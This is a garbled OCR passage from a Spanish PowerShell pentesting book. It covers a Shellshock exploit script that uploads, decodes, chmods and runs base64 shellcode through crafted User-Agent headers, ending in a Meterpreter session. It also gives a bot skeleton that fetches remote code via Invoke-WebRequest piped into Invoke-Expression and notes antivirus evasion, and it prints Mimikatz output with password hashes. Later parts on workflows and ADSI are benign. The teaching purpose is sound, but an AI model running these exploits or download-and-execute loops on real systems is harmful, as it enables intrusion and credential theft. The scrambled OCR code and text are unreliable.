la  ejecucion  del  script.  Si  no  ha  sido  activado  en  la  ejecucion  del  script ,  este  final  iza  ra  sin  mas 
acciones  quo  realizar.  Si  por  el  contrario  este  flag  ha  sido  activado  sc  ejecutaran  4  peticiones  contra 
la  direccion  URL  proporcionada: 

-  La  primera  peticion  S  response  =  request  - url  Sttrl  - user  Agent  "()  j ::  j;  echo;  /bin/echo 
$  base  64  >  /imp/pay"  sube  la  shellcode  en  base64  al  servidor  remoto  y  crea  un  fichero  en  / 
tmp/pay  con  dicho  contenido. 

•  La  segunda  peticion  Sresponse  =  request  - url  Surf  -userAgent  “()  {  f;  echo;  /bin/ 
cat  /tmp/pay  \  /usr/bin/base64  -d  >  / tmp/pay 2  "  transforma  cl  contenido  del  fichero  subido 
anteriormente,  el  cual  era  base64.  a  su  formato  original,  en  este  caso  un  binario  elf. 

La  tercera  peticion  Sresponse  -  request  -url  Surl  -userAgent  “()  /  ;;  /;  echo;  /bin/chmod 
44  /tmp/pay 2  "  cambia  los  permisos  del  binario  para  poder  ejecutarlo  en  la  siguiente  peticion. 

La  cuarta  peticion  Sresponse  -  request  -url  Surl  -userAgent  “(J  l  -V  }:  echo;  /tmp/pay.2  " 
^jeeuta  el  binario. 
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#main 

if  (check  -url  $url) 

echo  "target  vulnerable" 
if  (Sexploit) 

„ 

echo  "exploit. . . 

echo  "upload  shellcode...  $baseo4 
$ response  -  request  -url  Surl  -userAgent  0  I 

$base64  >  /tmp/pay"  . 

echo  "shellcode  m  base64  to  bma-y... 
Response  -  request  -url  Surl  -userAgent  0  l 
pay  |  /usr/bin/base64  -d  >  /tmp/pay2" 

echo  "chmod  to  binary..-  „.n  » 

Response  =  request  -url  Surl  -userAgent  0  l 

/trap/,  y  »exeeuting...  and  take  control! 

Sresponse  =  request  -url  Surl  -userAgent  (>  i 

} 

} 

else 

echo  "no  vulnerable" 

\ 


);  echo;  /bin/echo 

echo;  /bin/cat  /tmp/ 
};  echo;  /bin/chmod  744 
);  echo;  /rmp/pay2" 


se  habia  pasado  a  base(S4. 

...  ,  c  „n  .  n^M  se  nuede  utilizar  un  modulo  de  Metasploit  que  x 

SEsSsssrrs; 

hock 

#rii  Autor:  Pablo 
param  ( 

(Parameter (Mandatory) i 

[string)  Surl, 

[switch.  $explcit  *  S false, 

[Parameter (Mandatory) 

[string]  $base64 

) 

faction  request  [ 
param ( 

[Parameter (Mandatory) ] 

[string]  $url, 

[parameter (Mandatory) I 
[string]  SuserAgent 

S response  =  Invoke-WebRequest  Surl  -UserAgent  SuserAgent 
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return  Sresponse 

) 

function  check! 
param { 

[Parameter (Mandatory)  ] 

[string]  $uri 

) 

Sresponse  =  request  -url  Surl  -userAgent  "()  {  •;  echo;  /bin/echo  hols" 

Sresponse . RawContsnt 

return  (Sresponse .RawContent .Contains ( "hola") ) 


#rcain 

:f  (check  -url  Surl) 


echo  "target  vulnerable" 
if  (Sexploit) 

{ 

echo  "exploit. . . " 

echo  "upload  shellcode...  $base64" 

Sresponse  -  request  -url  Surl  —userAgent  "()  ( 

>  /tmp/pay" 

prho  "shellcode  Ir.  base64  t<  binary..." 

•ocnse  *  request  -url  Surl  -userAger. fc  *  i ) 

:  ,y  /usr/bin/baseM  -d  >  /Lrrp/pay/" 
echo  'Vhnod  to  binary..." 

Sreuponae  -  request  -url  Surl  -userAgent  "()  [ 

*tnp/pay2” 

echo  "executing...  3 nd  take  co-trol  J  *' 

Sresponse  =  request  -url  Surl  -userAgent  "()  \ 
I 


; ;  • ;  echo;  /bin/ echo 


•;  echo;  /bin/cat-.  /trap. > 

; ;  * ;  e u ho ;  / b : n / chmod  ~ 4  - 


:;  !;  echo;  /tmp/pay?" 


eoh«  "no  vulnerable" 


A  continuacion  se  puede  visualizar  una  imagen  en  la  que  se  ejecuta  el  script  de  Shellshock  con  los 
diferentes  parametros. 


(:\Users\pgon2alez\Desktop>  .\shellshock.psl  -url  http://192.168.56.102/ 

-base64  f0UMRgEBAQAAAAAAAAAAAAIAAnABAAAAUIAECDQAA 
,  ? «5M£££?£EQnl 1  AAA! AAAA I AECACABA i2AAAAGAEAAAcAA A AAEAAA2tDZ 

,  ! , ,  iuN0LhKcmxEoPFBDFFFgNFFuJgBphWaTpeige/0EpeXt0T9/q201/EI7julNblgKNTX/nJ 
‘ l.H.jcib  i/u6  mow  r  xNwC6  A  Q3GC5  lx  JDNpl  MLpNn  Pn  bup8  yxDNh  I  = 

•[.,{oitUUlnei>able 

u  kiUst”  - 

and  take  control! 


tig.  2.22:  Ejecucion  de 1  scrip/  que  ex  plot  a  la  vulnerabilidad  de  Shellshock . 
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■tortn.  a,  lanzamientci  de,  se  debe  ^4p^S"ist 

rrrxs 

una  consola  de  Meterpreter. 


5c  arcir.g  the  payload  handler...  z„d  3tage...<100  bytes) 

Transmittxr.g  cr.cermedxace  stager  for  o«r  axzed  . 

Sending  stage  (12410S3  bytes)  to  r-----  i92 . 162 . 56 . 102 : 59256) 

•  .  Meterpreter  session  4  opened  (192.168.56.101.4 

z  2015-06-02  15:35:26  +0200 


Leterpreter  >  sysxnfo 

Corrputer  •  ^  ^  3.12_telii.«*l64  #1  SMP  Debian  3. 12 . 6-2kaiil  (2014- . 

06)  (x26_64) 

Architecture  :  x£6_64 
Meterpreter  :  x86/lmux 

paeterpreter  >  |  _  — - — - 


15.  Un  bot  en  PowerShell  para  pentesting 

,•  ,  >onlP  HUnonen  de  las  herramicntas  necesarias  en  una 

lZn  algunas  ocasiones  un.  audiioi  o  un  a  at  ^  fisico  a  un  equipo,  ya  sea  eon  privilegio 

maquina  con  sistema  Microsoft  \\ituows.  eniui  o<  Microsoft  Vista  v  iene  de  forma  natiw 

O  sin  el.  se  tiene  al  alcance  de  la  mano  una  de  aeciones.  las  cuaks 

en  el  sistema  operativo,  y  puede  ser  aprov <-  ■  nronia  maquina  o  contra  otras  quest 

muchas  de  ellas  pueden  permitir  real.zar  ctertas  acetones  en  la  propta  mac, 

encuentrcn  en  la  red. 


En  este  apartado  se  presents .la  posibilidad  dc politic** 
podra  ser  ejecutado  en  local,  dcscargandola  deub,caconesr«no^  .  /  un , 

ejecucion.  Como  se  menciona  en  este  hbro,  ^n^^^ado  para  crear  un  Ml 
de  las  politicas  de  ejecucion.  Las  tecnicas  que  sc.  p  resumen  del  trabajo  expucsto  end 

PowerShell.  totalmcnte  funcional  y  util  en  un  /«"»'«*'•*  '  (;j  a  PowerShell  and  1  * 

congreso  de  seguridad  Qurtttba  Security  Congress  en  la  ponenc.a  One 

move  your  world. 


El  punto  dc  partida  para  el  penlesler  antes  de  la  creaaon  del  hoi  «  ienu  unL** 

no  disponer  herramientas  a  mano  o  la  postbthdad  de  ejecutote.  se  (,Se  ^ 

Quo  se  hace  sin  Foca?  6Se  podra  dejar  una  backdoor  en ‘  dc  -eJutar  atalquier  co* 

manipular  tokens  de  Windows  sin  las  herramientas  adccuac  a >  •  6  P  j  unlas  anted*1 

en  la  Lea  de  comandos?  PowerShell 'pmponnon.  ** 

gracias  al  potencial  que  ofrece  esta  llnea  de  comandos.  La  .dea  concepu 
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lipo  tie  codigo  desde  una  ubicacion  externa  a  la  organizacion.  cl  cual  no  sea  detectado  por  n ingun 
clemento  de  seguridad  de  la  organizacion,  y  poder  realizar  aeciones  en  el  cquipo  fisico  o  algun 
equipo  de  la  red. 

May  circunstancias  que  es  importanie  teneren  cuenta.  La  utilizacion  de  este  tipo  de  bots  en  la  linca 
de  comandos  de  PowerShell  ayuda  a  saltarsc  diferentes  mecanismos  de  proteccion.  por  ejemplo. 
pet  mite  al  peniester  evadir  sistemas  de  seguridad  como  puede  ser  un  antivirus.  Ademas.  el  penlesler 
puede  evadir  las  famosas  lislas  blancas  dc  ejecucion  de  aplicaciones  que  se  pueden  encontrar  en  los 
diferentes  equipos  de  una  organizacion,  se  evita  general-  trafico  sospechoso  utilizando  trafico  HTTP 
para  la  obtencion  de  cicrtas  funcional idades,  se  puede  utilizar  proxies  a  traces  de  los  cmdlets  de 
PowerShell  y  la  posibilidad  de  ejecutar  codigo  a  traves  del  terminal.  Estas  caracteristicas  avudan  a 
contrarrestar  la  limitacion  de  la  no  disponibiiidad  en  el  equipo  de  herramientas. 

Antes  de  seguir  describiendo  el  bot  es  importanie  comentar  que  este  tipo  de  hots  podrian  ser  remotos 
tantbien.  Podrian  utilizar  entomos  como  Twiner,  Facehook  o  Pastehin  como  panel  de  instrucciones. 
c  incluso  como  fuentes  donde  dcscargar  las  luncioncs  y  codigo  a  ejecutar  en  base  64.  Se  debe  tener 
cn  cuenta  que  el  hot  puede  ser  todo  lo  complejo  que  se  quicra.  incluso  que  podria  acabar  siendo  un 
tipo  de  malware  interactuando  con  el  registro  de  Windows  y  obteniendo  persistence  de  algun  modo. 
ya  sea  porque  se  introduzca  en  una  orden  cn  el  registro  o.  porque  se  genere  algun  tipo  de  script  con 
extension  .psl. 

I  n  este  apartado  se  pretende  disponer  de  un  esqueleto  basico  de  un  bot  con  el  que  cada  usuario 
pueda  aumentarlo  en  funcion  de  sus  necesidades.  El  esqueleto  basico  del  bot  sera  un  hucle  while  el 
cual  se  encarga  de  iterar  v  comprobar  que  funciones  se  quiere  descatgary.  posteriormente.  cargar  en 
cl  ainhito  de  ejecucion  de  PowerShell  para  despues  poder  invocarlas. 

Scondition  -  $true 

I  •  ’  ?D:reccior  I P  d6nde  ggrgai  _ 

«ft  caso  *lo  necGsidari 
Ic (Scondi t ion)  [ 

Scommand  -  Head-Host  "local$>* 

Scommand  -  ScoTnmand. spli l  ("  I  ") 

$' ’0001180:1 

$result  -  $i.rue 

it  ($resu. *  -eq  $Lrue) { 

if  ($command [01  -eq  "load*) 
f 

if  ($cornman>cUist  -notconiains  $co?rtmandfl  J )  \ 

3uri  *  "hetp: //* 

Sur i  $\3ri+="/";  $uri+-S'joruT.and [  1 1  ;  $uri  + 

Suri 

nvcke-WGbHequest  $ur±  Invoke-Expression 
Scoran-andlist  +--$coOTnanci[l] ) 
if  (^command  2].) 

$  coma  r.  do  =  Scommard  f  1] ;  $comando  +=  "  " ;  Scomando-t—  $coirtmand  f  5 1 
Scomando  |  Invoke— Expression 
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else 

Scomando  =  Sconsrnandt  *  j 
Scomanao  |  I nvofce- Express ion 

) 

Sexecute 

-,t  0)  , send-resulcs  -111.  Sc««.r,dUl  -lp^l» 

-  execution  Sex.cf!  SS..d-Twitt.rI»  S.x.cut.  -U.ern.n*  ««prw«« 

} 

$condi~ion  =  Scammand  -ne  "quxtl" 

} 

•Como  se  carga  el  c6digo?  A  traves  de  funciones  quc  son  descargadas  a  traves  del  cmdle,  Invoke. 
£™Con  este  Idle,  se  descarga  el  cddigo  desde  un  " 

comentado  se  puede  descargar  desde  otras  ubicaciones,  por  ejemp 

e  )  c6(li„0  que  se  quiere  ejecutar  no  se  encuentra  hardcodeado  en  el  script  pox  lo  que  se  entiende 
cie  el  Sdigo  es  cargado  en  el  ambito  del  scrip,  dinamicamente.  dotando  de  gran  po  enc.al  a  es,e 

de“«cLdo  d  cddino  «  tmmp*.  m  tom.  *  tec*.  *  tomSMI 

para  cargar  la  funddn  en  el  Smblto  del  scrtpl  con  el  fin  de  podu  mvocarU* 

ahora  en  adelante. 

it (Sconmandlist  -notcontains  Scommand | 1 ) ) l 

$uri  *  "hxtp : //"  * 

$uri  » ~$ip; ;  Suri^ccfBOfand LU ; Suri+=  •cjcr 

Sux  i 

Invcfce-WebRequest.  $ari  i  Invoke-EixprebS 
$  Cpnunandliat^S  command  [  1] 


•  ne  donde  se  leen  los  comandos?  Como  se  menciono  anterionnente  los  comandos  pucden  ser  lefdos 

cnremotodc  cl“  de  Tm/rrcr .  ejemplo.  Tanrbien  puede  S«r  leido  del  prop,., 

dd,  de  se  cargan  las  funciones  dinamicamente.  En  es,c  ejenrplo.  y  entendrendo  que  el  u  nan,  « 
™"„tma  m,  tn  entomo  local,  sera  este  el  que  los  introduces  desde  .tpromp,  Se  dectdto  altar- 
nomenclatura  basica,  la  cual  consta  de  ires  partes: 

-  Comando  de  carga  denominado  load. 

El  segundo  comando  indica  el  nombre  de  la  funeidn  que  acaba  de  ser  cargada  con  /»* 
WehRequest  concatenado  eon  Invoke-Expression. 

-  El  terccr  comando  es  opcional  e  indica  los  parameters  que  deben  sei  pasados  a  a  un 
que  sc  ha  cargado  cn  el  ambito  del  script  previamente. 


En  resume,,  I.  embeds  es  la  siguiente  load  |  <no,„bn- . /,t»cfdn>  I 
Supongase  que  exisle  una  funcion  como  la  que  se  muestra  en  la  imagen.  De.  /  / 

Suta  la  instruccion  load  |  vpnjnittn  \  -ip  <direccion  IP  vpn  servers  y  ^V****^ 
le  puede  ver  en  cl  codigo.  una  vez  se  introduce  la  orden.  se  descarga  y  carga  el  cod. go  en 
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del  script  en  forma  dc  funcion  y  se  invoca  su  ejecucion.  Hn  este  caso  esta  funcion  generara  un  profile 
de  VPN  y  realizara  la  conexion  a  un  servidor  de  VPN  ubicado  en  la  direccion  IP  que  se  paso  a  la 
luncion.  t',Que  se  consigue  con  este  ejemplo?  El  trafico  de  la  maquina  donde  se  encuentra  el  usuario 
comenzara  a  salir  por  defecto  por  cl  servidor  de  VPN  consiguiendo  realizar  un  Man  In  The  Middle . 
ya  que  todo  el  trafico  puede  ser  monitorizado  por  el  usuario  remoto. 


Fig.  -.-V'  Codigo  en  unfichero  TXT  de  una  funcion  que  se  puede  cargar  con  et  hoi . 


Otro  ejemplo  dc  codigo  que  se  puede  ejecutar  es  un  mimikatz.  Este  codigo  se  puede  obtener 
del  conjunto  de  scripts  que  proporciona  PowerSploit  a  traves  de  su  git  hub  https://githuh.cnnj 
mui tifes tat ion/PowerSploif.  Sobre  PowerSploit  se  estudiaran  muchas  mas  cosas  en  siguientes 
capitulos  del  libros.  Como  se  puede  visualizar  en  la  imagen,  una  vez  que  la  funcion  es  descargada 
>  cjecutada  en  el  ambito  del  bot.  la  salida  proporciona  information  sobre  las  contrasenas  dc  los 
usuarios  que  han  iniciado  sesion  en  el  sistema.  Es  importante  recordar  que  para  ejecutar  Mimikatz 
cn  el  sistema  se  debe  tenor  privileges. 


Authentication  Id  : 

0  ;  64899  <00000000: 0000f C83  > 

Session  : 

Interactive  fron  1 

User  Nane  : 

Adnin istrator 

Dona in  : 

ps  lie  118 

S-l -5-21-3507275698-1 183418431 -608800615-500 

SID  : 

nsv  : 

1000HH0W3 J 

Pr inary 

"  Uscrnane 

:  Adnin istrator 

"  Dona in 

:  pshc  1 18 

«  LM 

:  8735172c3a?7d2c6Su.»cd84cd494924f 

"  NTLM 

:  701Saa262?690d<ill00cS0d3f  2937f  18 

«  SHA1 

:  354417c ?«\665da?483?38c65d8dce7b3f lcbc2?4 

tspkg  : 

■  ITTB  r  Lilli  J  -L| 

*  Usernanc 

:  Administrator 

"  Donain 

:  pshc 118 

*  Password 

:  123abc.. 

wdigest  : 

"  Uscrnane 

:  Adnin istrator 

"  Donain 

:  pshc]  1ft 

"  Password 

:  123abc . . 

livcssp  :  1 

Kerberos  : 

"  Uscrnane 

Adnin istrator 

"  Donain 

pshc 118 

*  Password 

123abc . . 

P  • 

Fig.  2.25;  Ejecucion  de  la  funcion  de  Mimikatz  a  traves  de  PSBol . 
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A  continuacion  se  puede  ver  un  recopilaiorio  dc  proyectos.  conjuntos  dc  scripts  y  frameworks  que 
utilizan  codigo  PowerShell  para  ejecutar  acciones  a  bajo  y  alto  nivel  y  pueden  ser  utilizados  en 
ataques  en  un  pentest. 

En  los  proximos  capitulos  se  estudiaran  diversos  frameworks,  y  aunque  ahora  se  hace  un  pequeno 
resumen  de  los  utilizados  en  esle  hot.  hay  otros  que  aportan  niuchas  functonahdades  interesantes 
para  el  pentesting  con  PowerShell. 

-  PowerUp.  Proporciona  diferentes  hcrramientas  para  llevar  a  cabo  escaladas  de 
privilegios  en  Windows.  Su  Github  esta  en  la  direccion  URL  https://githuh.com/Veil. 

Framework/PowerTools/tree/master/Powerllp. 

-  PowerSploit.  Como  se  comento  anteriormente  es  el  conjunto  de  scripts  de  PowerShell 
por  excelencia.  Su  Github  esta  en  la  direccion  URL  https://github.com/mattifestation/ 
PowerSploit. 

_  Posh-SecMocl  Un  framework  el  cual  permite  interactuar  con  Shodan,  Metasploit  o 
tfessus  Puede  ser  utilizado  en  posl-explotacion  o  identificacion  y  descubrimiento  de  activos. 
Su  Github  se  encucnlra  en  la  direccion  URL  https://github.com/darkoperator/Posh-SecMod. 

-  PEchecker  Estos  scripts  comprueban  las  opciones  de  compilacion  y  mecanismos  de 
proteccion  como  son  ASLR.  DEP,  SafeSEH.  entre  otros.  Su  direccion  URL  dc  Github  se 
encuentra  en  https://githuh.com/NetSPJ/PEcheckei . 


1 6.  Workflows 

Los  workflows  o  flujos  de  trabajo  pcrmiten  al  administrador  utilizar  estos  para  ejecutar  tarcas  o 
acciones  en  paralelo  en  la  propia  linea  de  comandos.  Esta  futicionalidad  puede  ser  realmente  uti 
para  aprovechar  el  potencial  de  la  maquina  y  los  recursos  hardware  y,  ademas.  automatizar  de 
manera  mas  eficiente  las  tarcas  a  realizar  en  el  dia  a  dta  del  pentesting. 

Estos  flujos  de  trabajo  aparecen  en  la  version  3.0  de  la  linea  de  comandos  de  Microsoft  y  aportan 
potencia  al  usuario. 

;  p0r  que  los  workflow  en  PowersheU?  Esta  prcgunta  tiene  una  sencilla  respuesta  la  nubeyks 
centros  de  datos  basados  en  Windows.  La  computacion  en  la  nube  proporciona  aha  dispombilidad, 
servicios  escalables  que  aprovechan  un  gran  volumen  de  datos,  etceteia. 

La  gestion  del  cloud  tiene  que  ser  liable  y  para  disponer  de  esta  fiabilidad  se  mtegran  los  "vrkP°*[ 
en  Powershell.  Suelen  ser  flujos  de  trabajo  de  larga  duracion  que  estan  disenados  para  sopt 
errores  de  los  componentes  o  dispositivos  de  red.  es  decir,  resistir  a  los  fallos. 

Powershell  se  aprovecha  de  la  escalabilidad  y  la  madurez  en  la  que  se  encuentra  Windows  Oorkfto * 
Foundation  4.0  para  llevar  los  beneficios  de  los  flujos  de  trabajo  a  los  desarrolladores  en  o\u 

Los  objctivos  principales  de  los  workflow  son  los  siguientes: 
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-  Minimizar  la  complejidad  dc  la  automatizacion  a  traves  de  un  gran  numero  de  equipos  o 
centro  de  datos. 

-  Realizar  mayor  numero  de  tareas  en  paralelo  para  lograr  una  optimizacion  de  tiempos. 

Sc  niejoraron  los  siguientes  aspectos: 

-  Flujo  de  trabajo  simplificado. 

-  Reutilizacion  del  conocimiento  existente,  es  decir,  en  Windows  Wokflow  Foundation. 

-  Realizar  un  flujo  dc  trabajo  fiable. 

-  Rendimiento  y  escalabilidad. 


El  flujo 

Para  la  creacion  de  flujos  de  trabajo  se  ha  reutilizado  la  sintaxis  de  Powershell .  Este  movimiento  de 
Microsoft  se  produce  para  facilitar  al  usuario  que  ha  invertido  tiempo  en  el  aprendizaje  de  esta  linea 
de  comandos.  Los  workflow  XAML,  extensible  Application  Markup  Language,  son  compatibles 
con  Powershell .  por  lo  que  si  se  disponen  de  este  tipo  de  workflows  seguiran  siendo  compatibles. 

Si  el  administrador  o  pentester  escribe  con  asiduidad  scripts  en  Powershell  sera  realmente  sencillo 
cl  eseribir  los  flujos  de  trabajo.  Se  aprovechara  los  conocimientos  que  se  disponen  para  el  desarrollo 
de  scripts  y  simplemente  ahadiendo  nuevas,  pero  pocas,  construcciones  se  generaran  los  workflows . 

Antes  de  ver  el  esqueleto  de  un  workflow  se  debc  tener  en  mente  algunos  conccptos  como  son  la 
seccidn  paralcla  y  secuencial  que  seran  estudiadas  mas  adelante. 

A  continuacion  se  especifica  el  esqueleto  de  un  workflow  y  el  aspecto  que  estos  tienen: 

•Er.  primer  lugar  se  indie&n  siedianre  la  palabra  rese^fada  workflow 
Workflow  pruebal 

mostraxa  por  pantalla  la  frase  hola  mu.ndol 
,'hola  mundo!" 
iprueba 

Hay  que  dcstaear  que  el  cierre  de  Haves  no  indica  el  Anal  de  la  ejeeucion  como  se  puede  pensar  a 
priori.  Si  se  eseribiesen  ordenes  despues  del  cierre  de  Haves,  antes  dc  indicar  el  final  del  workflow 
con  la  palabra  que  da  nombre  aJ  flujo  de  trabajo.  sc  cjecutarian  previamente  al  lanzamiento  de  las 
instnicciones  que  se  encuentran  en  el  interior  de  las  Haves.  Como  ejemplo  se  propone  el  siguiente 
codigo: 

•-f'  primer  iuqar  je  indlcar.  Trediante  la  palabra  reservada  workflow 
Workflow  pruebal 

mostrara  por  pantal:.a  la  frase  hola  mundo! 
nola  mundo'" 

clear**host 

fct-childitein 

Prueba 
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Directorio:  C:\Users 

\Administrador 

Mode 

Lastl/riteTime  Length 

Name 

d-r — 

25/06/2012 

11:04 

Contacts 

d-r — 

25/06/2012 

11:04 

Desktop 

d-r — 

25/06/2012 

11:04 

Docunen ts 

d-r — 

25/06/2012 

11:04 

Downloads 

d— r — 

25/06/2012 

11:04 

Favorites 

d-r — 

25/06/2012 

11:04 

Links 

d~r — 

25/06/2012 

11:04 

Music 

d-r — 

25/06/2012 

11:04 

Pictures 

d-r — 

25/06/2012 

11:04 

Saoed  Games 

d-r — 

25/06/2012 

11:04 

Searches 

d-r— 

prueba? 

25/06/2012 

11:04 

Uideos 

Fig.  2.26 :  Ejecucion  cie  t in  workflow  bdsico. 


Existen  ciertas  palabras  reservadas  para  optimizar  y  configurar  la  ejecucion  de  los  workflows.  Se 
puede  rcquerir  ciertas  tareas  en  paralelo  y  otras  de  manera  secuencial.  Para  ello  se  dispone  de  las 
palabras  reservadas  Parallel  y  Sequence.  La  semanlica  es  bastante  sencilla.  si  en  el  cuerpo  de  un 
workflow  se  indica  un  campo  Parallel  abriendo  Haves  se  especifica  que  las  tareas  que  se  escriban  en 
el  interior  de  ese  campo  se  realizaran  en  paralelo.  Por  el  contrario  si  en  el  cuerpo  de  un  workflow  se 
indica  un  campo  Sequence  se  indica  que  las  tareas  que  se  encuentren  en  el  interior  de  las  Haves  se 
ejecutaran  de  manera  secuencial.  es  decir,  siguiente  el  orden  de  aparicion  en  el  script.  Como  ejemplo 
se  puede  observar  el  siguiente: 


Workflow  prueba { 

# tareas  en  paralelo 
Parallel  1 

Get-chi iditem 
"Segunda  tarea" 
) 


Fig.  2.27:  Ejecucion  en  paralelo. 
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Se  puede  observar  como  la  ejecucion  en  paralelo  puede  provocar  que  cuando  las  tareas  requieran 
utilizer  cl  recurso  de  la  pantalla  la  salida  dc  inlonnacion  sea  entre  medias,  y  ejecutando  varias 
veces  el  mismo  workflow  la  salida  o  presentacion  de  la  informacion  se  en  distinto  orden.  Se  puede 
visualizar  como  las  dos  tareas  son  ejecutadas  simultaneamente. 


En  el  siguiente  ejemplo  se  ejecuta  dos  tareas  en  paralelo.  pero  una  de  ellas  tiene  varias  instruceiones 

secuenciales. 

Work: low  prueba ( 

* tareas  en  paralelo 
Parallel { 

“tareas  secuenciales  de  la  primera  tarea  en  paralelo 
Sequence { 

Get - ch i ldi tern 
"Segunda  secuencial" 

) 

"Segunda  tarea" 

\ 

\ 

prueba 


Directorio:  C:\Users 

Mode  LastlJriteT  ime 

Length 

Name 

PSComputerName 

d -  25/06/2012 

11:04 

Administrador 

localhos t 

d-r —  19/05/2012 

11:35 

Public 

localhost 

-a -  19/07/2012 

14:49 

142 

i64.txt 

localhost 

-a -  19/07/2012 

14:51 

2114 

proc . txt 

localhost 

Segunda  tarea 

Segunda  secuencial 

PS  C:\Users>  i64 

Directorio:  C:\Users 

Mode  LastlJriteT  ime 

Length 

Name 

PSComputerName 

tt  —  25/06/2012 

11:04 

Administrador 

localhost 

r  19/05/2012 

11:35 

Public 

localhost 

Segunda  tarea 

19/07/2012 

14:49 

142 

i64.txt 

localhost 

19/07/2012 

14:51 

2114 

proc .txt 

localhost 

junda  secuencial 

Fig.  2.28:  Ejecucion  en  paralelo  con  I areas  secuenciales. 


Sc  puede  observar  cn  el  codigo  como  existen  dos  tareas  en  ejecucion  paralelas,  mientras  que  la 
pnmera  tarea  paralela  dispone  de  dos  instruceiones  secuenciales.  En  la  ejecucion  se  puede  visualizar 
como  la  primera  tarea  paralela  ejecuta  dos  subtareas  o  instruceiones  de  manera  secuencial  y  en 
ningun  caso  se  ejecutara  la  segunda  antes  que  la  primera. 


°tcl  contrario  si  que  se  puede  solapar  la  segunda  tarea  que  se  ejecuta  en  paralelo  con  las  otras  dos 
instruceiones  que  componen  la  primera  tarea  paralela. 
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Alaunas  instmcciones  pueden  provocar  errores  en  el  cuerpo  del  workflow  y  no  ejecutarse  o  compictar 
la  (area  o  subtarea.  Es  por  esto  que  se  utilizan  los  InlineScrtpl ,  son  pequeiios  bloques  de  script  que  se 
ejecutan  en  cl  interior  del  workflow  y  pemiitcn  ejecutar  esas  instrucciones  que  antenormente  daban 

error. 


Directorio  activo,  ^Por  que? 

Kl  directorio  activo  permite  a  los  administradores  gcstionar  los  rccursos.  usuarios.  permisos.  poUticas 
de  seguridad  de  manera centralizada.  Esta  implementacion  utiliza  distintos  protocolos.  como  pueden 
ser  DNS  ( Domain  Name  System),  Kerberos .  LDAP  (Lightweight  Directory’  Access  Protocol). 


Un  ejemplo  de  codigo  y  ejecucion  de  InlineScript  es  el  siguiente: 

Worlcflcw  pruebal 
#tareas  en  paralelo 
Parallel { 

*1  tareas  secuenciales  de  la  primera  tarea  en  paralw- 
Sequence { 

Get-childiLein 
"Sequnda  secuencia' " 

InlineScript^ 

$a=l+2G 

$b=$a+i 

$b 

y 

y 


Pruena 


InlineScript  ^ 
En  ejecucion 


1.6:  Linea  i64:6  char:6 


rPS  C : \Users  > 

PS  C:\Users>  i64 


Directorio:  C:\Users 


IMode 

Last Write Tine 

Length 

Nane 

25/06/2012 

11:04 

Administrador 

19/05/2012 

11:35 

Public 

19/07/2012 

14:49 

142 

i64.txt 

wsn 

19/07/2012 

14:51 

2114 

proc.txt 

IS  e  gun  da 

secuencial 

fig,  2.29  Ejecucion  de  InlineScript. 


PS Computer Name 


localhost 

localhost 

localhost 

localhost 


Se  puedc  visualizar  el  directorio  activo  como  una  gran  base  de  dates  centralizada,  accesible  desde 
una  red  distribuida  y  organizada.  En  el  directorio  activo  se  dispone  de  objetos,  que  pueden  ser 
usuarios.  recursos  y  servicios. 

El  objetivo  dc  cstc  apartado  es  cxplicar  las  herramientas  que  se  disponen  en  Powers  he! I  para  gestionar 
e|  directorio  activo.  Las  tareas  reali/adas  con  Powershe/I  sobre  el  directorio  activo  pueden  resultar 
de  gran  utilidad  al  administrador  en  el  instante  de  gestionar  los  scripts  para  la  automatizacion  de 
tareas. 

Para  versiones  previas  a  Windows  2008  R2  se  dispone  de  ADSUActive  Directory  Service  Interfaces . 
el  eual  soporta  distintos  tipos  de  directorios.  por  ejemplo.  LDAP  o  la  base  de  datos  de  cuentas  locales 
de  Windows  SAM.  Security  Account  Manager.  ADSI  no  aporta  riqueza  semantica  a  Powers  hell,  ya 
que  no  cxisten  emdlcts.  Cuando  se  reqtiiera  trabajar  sobre  bases  de  datos  de  cuentas  locales  se  debe 
utilizar  ADSL  y  en  versiones  servidor  donde  no  se  disponga  de  la  posibilidad  de  utilizar  el  modulo 
de  directorio  activo  de  Powershe/I  tambien. 

En  Windows  2008  R2  se  dispone  de  un  modulo  para  Powershellp ara  la  gestion  del  directorio  activo. 

I  ste  modulo  aporta  gran  flexibilidad  y  sencillez  para  realizar  las  tareas  de  gestion  del  directorio 
activo  y  su  uso.  siempre  que  se  pueda.  es  altamente  recomendado.  LI  modulo  dispone  de  un 
pruveedor.  como  los  vistos  anteriormente  en  el  libro.  y  un  conjunto  dc  cmdlets  para  la  inte  race  ion 
con  el  directorio  activo. 


ADSI:  La  API  para  equipos  locales 

ADSI  puedc  interactuar  con  la  base  de  datos  de  cuentas  locales  de  los  equipos  eliente  de  Windows 
v  las  versiones  servidor  a  excepcion  del  eontrolador  de  dominio.  Esta  base  de  datos  denominada 
SAM.  almacena  objetos  de  tipo  usuario  y  grupos  de  usuario.  LI  provecdor  que  sc  utifizara  la  acceder 
a  cstos  objetos  es  Win  NT :  y  hay  que  especificar  que  las  mayuseulas  y  minusculas.  en  esta  ocasion. 
tienen  relevancia. 


17.0tros  productos 

Hn  esie  apartado  se  cstudiara  la  interaccion  con  productos  de  Microsoft ,  como  el  directorio  atiiv® 
o  Internet  Information  Service.  Tambien  se  explicara  la  mejor  forma  de  utilizar  los 
proporcionan  los  modules  de  directorio  activo  y  de  IIS.  Esto  proporciona  una  idea  bastcaal pern 
que  puede  utilizar  esta  infonnacion  para  sus  scripts ,  como  hacen  muchos  frameworks  de  os  q 
cstudian  en  el  libro. 


Eua  gestionar  esle  tipo  dc  bases  de  datos  se  intentara  buscar  una  estrategia  para,  en  primer  lugar, 
disponer  de  una  logica  y  conocimiento  de  lo  que  se  va  a  realizar.  y  en  segundo  lugar.  optimizar  el 
indigo  de  scripting  para  seguir  un  patron  e  in  ten  tar  automalizar  cl  proceso. 


primer  paso  sera  realizar  la  conexion  a  la  maquina.  ya  sea  local  o  remota.  Para  ello  la  instruccion 
que  se  debe  ejecutar  cs  Scon  =  [ ADSI ] ’  ’  Win  NT:// <tndqu  ina>  *\  La  instruccion  utiliza  el  proveedor 
tn'  :  y  se  conecta  a  la  maquina  que  sc  requiera,  si  la  maquina  fuera  local  se  deberia  ejecutar  la 
instruccion  tal  cual  Scon  =  [ ADSI /  ’ ’ WinN T://S( has tname)  Para  cualquier  interaccion  con  la  SAM 

50  a^rir  la  conexion  con  la  maquina. 
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Una  vez  se  dispone  de  la  conexion  abieria  se  puede  empezar  a  realizin'  consultas,  msu-uones  o 

modificaciones  sobre  la  miiquina.  Es  importante,  para  eniender  la  0 

